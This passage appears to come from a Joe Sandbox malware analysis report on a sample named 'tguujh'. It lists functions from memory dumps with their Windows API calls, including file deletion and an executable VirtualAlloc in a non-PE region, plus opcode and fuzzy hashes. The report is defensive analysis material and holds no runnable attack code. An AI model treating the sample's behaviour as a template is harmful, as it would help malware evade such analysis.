                                                              • Instruction ID: a5338ef6bcfc15061e5bd57e3189f1d5f6ca74a2960c87623a85094a181a30fc
                                                              • Opcode Fuzzy Hash: 6e77e52b304bfa925ece0f0a2aa1374e3df6684768d23306f62ba3eaf93ab963
                                                              • Instruction Fuzzy Hash: F511A539500218A7CF14EBA49C05EED73B8AF1835AF004065BD55E7291DE7497CC9725
                                                              Function 00C7E992 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                              • Instruction ID: 645229880f02d2806f53c02fe0f3247da7e2a03e8ad7f4852b6c57d9e0e3f333
                                                              • Opcode Fuzzy Hash: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                              • Instruction Fuzzy Hash: 9AF028335116209BC6313A6A9C09BAE37989F46338F108755FA7D921D1EFB0D902A795
                                                              Function 00C83BB0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C76A99,?,0000015D,?,?,?,?,00C785D0,000000FF,00000000,?,?), ref: 00C83BE2
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: c70d7ba115e5f1ae24b81e8ecf40b8f44ebd81f47c17c40317a95cb5e1f31c8e
                                                              • Instruction ID: 9b921a8aad31d7d8accc69a09bf2296792d548baac3ff5a2f1b7bf2facac72ef
                                                              • Opcode Fuzzy Hash: c70d7ba115e5f1ae24b81e8ecf40b8f44ebd81f47c17c40317a95cb5e1f31c8e
                                                              • Instruction Fuzzy Hash: 74E0EDB12042A4A7E6213A6B9C00F7A3648EB42FA4F156121BC2AD60E0DB60DF0183F8
                                                              Function 00C563DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72e21fc608036fb5576d2a5f364e3712dee8b14d6822edb0d51d1884f4e851e9
                                                              • Instruction ID: 110e1e57da4038bc3dd27839c06d245571df39c26327244e3ade44e554d8c212
                                                              • Opcode Fuzzy Hash: 72e21fc608036fb5576d2a5f364e3712dee8b14d6822edb0d51d1884f4e851e9
                                                              • Instruction Fuzzy Hash: 14F08575000702CFCB348F20D494816BBE0FF0432A320893EE5EB87620C731A884DB00
                                                              Function 00C8510A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00C8512C
                                                                • Part of subcall function 00C82D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4), ref: 00C82D6E
                                                                • Part of subcall function 00C82D58: GetLastError.KERNEL32(00D21DC4,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4,00D21DC4), ref: 00C82D80
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast_free
                                                              • String ID:
                                                              • API String ID: 1353095263-0
                                                              • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                              • Instruction ID: 0c18c705ec575689d22553df903a879105e84a9aedb1c0d7e23279517a5791cb
                                                              • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                              • Instruction Fuzzy Hash: 5AE092761007059FC720DF6CD804A86B7E5EF85324320852AE8AED7220D371E812CB44
                                                              Function 00C5653A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock
                                                              • String ID:
                                                              • API String ID: 2638373210-0
                                                              • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                              • Instruction ID: b76bcd08f87acbfb9fb2147ff0e5d2fe0470ab81de113e0eab477a1220a09f15
                                                              • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                              • Instruction Fuzzy Hash: 89F0D47640020DBBDF05DF90C941A9E7B69FB08318F208485F9199A152D336DA61EBA1
                                                              Function 00C54154 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                              • Instruction ID: e1972bc9a8a667f6cce197bc407cf21010f1a723695c751895c94cdbadde7a2f
                                                              • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                              • Instruction Fuzzy Hash: C1D0A72334245037B66D313D6D0BC7F491CCBC26A0B15803FFA0ACA1A5ED444C0311E0
                                                              Function 00CBE783 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CBE7A2
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: NamePathShort_wcslen
                                                              • String ID:
                                                              • API String ID: 2021730007-0
                                                              • Opcode ID: f426db24a2946b7bbe42161f9cbf5ef2faf403c3e04977e289c7d99ee19da114
                                                              • Instruction ID: 089adf65351c33d7413b165809ebd95c615309fd2db2fe5864f3e8599eb4ef3d
                                                              • Opcode Fuzzy Hash: f426db24a2946b7bbe42161f9cbf5ef2faf403c3e04977e289c7d99ee19da114
                                                              • Instruction Fuzzy Hash: 4EE0CD7650022457CB2093589C05FDA77DDDFC8791F040070FD05D7248DD64DD849590
                                                              Function 00C6F13C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,00C5B0DE,?,?,00000000,?,00C56B73,?), ref: 00C6F156
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: ffd8041388b65033f76442b8d8fae965902e60e35d3435a092a1ae45c0abea64
                                                              • Instruction ID: e4cb4a659e638456ecd6d42b2a3a0843554d753df3add60d52d87cff370fc62c
                                                              • Opcode Fuzzy Hash: ffd8041388b65033f76442b8d8fae965902e60e35d3435a092a1ae45c0abea64
                                                              • Instruction Fuzzy Hash: 56E092B5510704AFD728DF55D846D9BBBF8EB08320B00455EA85697740E7B1BD448B50
                                                              Function 00C539DE Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C539FD
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath_wcslen
                                                              • String ID:
                                                              • API String ID: 541455249-0
                                                              • Opcode ID: e8e03e77aeb7b69c33868ba466025fb41b855d8b3d8217d61fdf0ed1b82e52bb
                                                              • Instruction ID: ea208a75f576631b67451cee91bed99feb2086a3eec95805ae547c65ea889b52
                                                              • Opcode Fuzzy Hash: e8e03e77aeb7b69c33868ba466025fb41b855d8b3d8217d61fdf0ed1b82e52bb
                                                              • Instruction Fuzzy Hash: 4BE0CD7650012457CB2093589C05FDA77DDDFC8791F040071FD05D7248DD64DD849590
                                                              Function 00CBE753 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CBE76C
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FolderPath_wcslen
                                                              • String ID:
                                                              • API String ID: 2987691875-0
                                                              • Opcode ID: 29d0b677c28a06e7641da70db9b3787c2d800aacace9da2041695934eda6d088
                                                              • Instruction ID: 063753df8e166f2dbded867f5a6b119901b939e952a6d339fb0d31036d914b29
                                                              • Opcode Fuzzy Hash: 29d0b677c28a06e7641da70db9b3787c2d800aacace9da2041695934eda6d088
                                                              • Instruction Fuzzy Hash: 48D05EA69002282FEF60A6749C0DEBB3AACC740210F0006A07C6DD3182EA34ED8886A0
                                                              Function 00CBDA5C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00CBD9DC,?,?), ref: 00CBDA72
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: c35d66adad45e6bb1da03e22828f067086b1332adb0cae0b20783d7238f72a56
                                                              • Instruction ID: f49a333c28e2171ed8b95381e38a76bc65349e20164d5e99a8846f5a30e19cdf
                                                              • Opcode Fuzzy Hash: c35d66adad45e6bb1da03e22828f067086b1332adb0cae0b20783d7238f72a56
                                                              • Instruction Fuzzy Hash: 2FD0A7305D0208BBEF108B50CC03F9DB76CE701B45F104194B201EE0D0C7B5A9089724
                                                              Function 00C9073A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00C90AA4,?,?,00000000,?,00C90AA4,00000000,0000000C), ref: 00C90757
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: a2dbcd68141c49dd05f1567221062bb118ebd59416c66bf63fd01c086cf838d2
                                                              • Instruction ID: 7a5893939dd77c1061edbbaa101242685516d6a42aa8d657fbfa7661a312de1f
                                                              • Opcode Fuzzy Hash: a2dbcd68141c49dd05f1567221062bb118ebd59416c66bf63fd01c086cf838d2
                                                              • Instruction Fuzzy Hash: BED06C3200014DBFDF028F84DD46EDE3BAAFB48714F014000BE1856020C732E821AB91
                                                              Function 00CBE9C5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: f6d8be9df4caff4cff1c4abb9b41098cbd1bbcda6e84d43b9b942bfe27b75391
                                                              • Instruction ID: 6fa0626c18ecdeafe0a1509c25182e05fb118cd82ea2252c70326c47d565f06a
                                                              • Opcode Fuzzy Hash: f6d8be9df4caff4cff1c4abb9b41098cbd1bbcda6e84d43b9b942bfe27b75391
                                                              • Instruction Fuzzy Hash: 00B0922440062005BD780A3C1A482ED23016843BA7BD85B95E4BA991E2C3398D0FE610
                                                              Function 00CC6561 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CBDB69: FindFirstFileW.KERNELBASE(?,?), ref: 00CBDBE0
                                                                • Part of subcall function 00CBDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00CBDC30
                                                                • Part of subcall function 00CBDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CBDC41
                                                                • Part of subcall function 00CBDB69: FindClose.KERNEL32(00000000), ref: 00CBDC58
                                                              • GetLastError.KERNEL32 ref: 00CC6583
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                              • String ID:
                                                              • API String ID: 2191629493-0
                                                              • Opcode ID: 43cd2580a488fb3d577f4e46f5c8aadad440e6de5b62eae183728ef993380a9e
                                                              • Instruction ID: 78062f151dd44818f03a580991f278cd29883b2bb500a91b7c9a64d01b0dc24e
                                                              • Opcode Fuzzy Hash: 43cd2580a488fb3d577f4e46f5c8aadad440e6de5b62eae183728ef993380a9e
                                                              • Instruction Fuzzy Hash: 89F08C362002048FCB14EF58D845B6EB7E5AF48761F048009F90A9B362CB70BD859B98
                                                              Function 00C57953 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,00000000,00C93A1C), ref: 00C57973
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: c7a71465c04467f4264ea4d4ac20f702b804bfa41e0c642628e5c36ed2c3e3e0
                                                              • Instruction ID: d8ca7cb5d691ffa483e2421f9b93419cb86600bb93896e69fdb57c901c297f42
                                                              • Opcode Fuzzy Hash: c7a71465c04467f4264ea4d4ac20f702b804bfa41e0c642628e5c36ed2c3e3e0
                                                              • Instruction Fuzzy Hash: 1CE09279404B22CFC3314F1AE844412FBF4FED23623204B2ED4E682660D3B059CACB64
                                                              Function 014A1D58 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,014A19BB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 014A1D77
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000003.1563565662.0000000001412000.00000004.00000020.00020000.00000000.sdmp, Offset: 014A1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_3_1412000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1cea94dc80e2b45d11bdd8ca62d5731ee97160fc2a40b9d2cbedb5ea827d7d57
                                                              • Instruction ID: ba5d9c6d21ebab3a0d46061c1b435bfa29c6cd2f5272ce0fc3379c8d0cf8fa7a
                                                              • Opcode Fuzzy Hash: 1cea94dc80e2b45d11bdd8ca62d5731ee97160fc2a40b9d2cbedb5ea827d7d57
                                                              • Instruction Fuzzy Hash: 3FD0227018430236F6017BB24C02F083680AF74F02FC0080CF319380F0C5BAE40A0692
                                                              Function 014A1D58 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,014A19BB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 014A1D77
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000003.1563565662.0000000001412000.00000004.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_3_1412000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1cea94dc80e2b45d11bdd8ca62d5731ee97160fc2a40b9d2cbedb5ea827d7d57
                                                              • Instruction ID: ba5d9c6d21ebab3a0d46061c1b435bfa29c6cd2f5272ce0fc3379c8d0cf8fa7a
                                                              • Opcode Fuzzy Hash: 1cea94dc80e2b45d11bdd8ca62d5731ee97160fc2a40b9d2cbedb5ea827d7d57
                                                              • Instruction Fuzzy Hash: 3FD0227018430236F6017BB24C02F083680AF74F02FC0080CF319380F0C5BAE40A0692
                                                              Function 014A1D58 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,014A19BB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 014A1D77
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000003.1563565662.0000000001412000.00000004.00000020.00020000.00000000.sdmp, Offset: 01457000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_3_1412000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 1cea94dc80e2b45d11bdd8ca62d5731ee97160fc2a40b9d2cbedb5ea827d7d57
                                                              • Instruction ID: ba5d9c6d21ebab3a0d46061c1b435bfa29c6cd2f5272ce0fc3379c8d0cf8fa7a
                                                              • Opcode Fuzzy Hash: 1cea94dc80e2b45d11bdd8ca62d5731ee97160fc2a40b9d2cbedb5ea827d7d57
                                                              • Instruction Fuzzy Hash: 3FD0227018430236F6017BB24C02F083680AF74F02FC0080CF319380F0C5BAE40A0692

                                                              Non-executed Functions

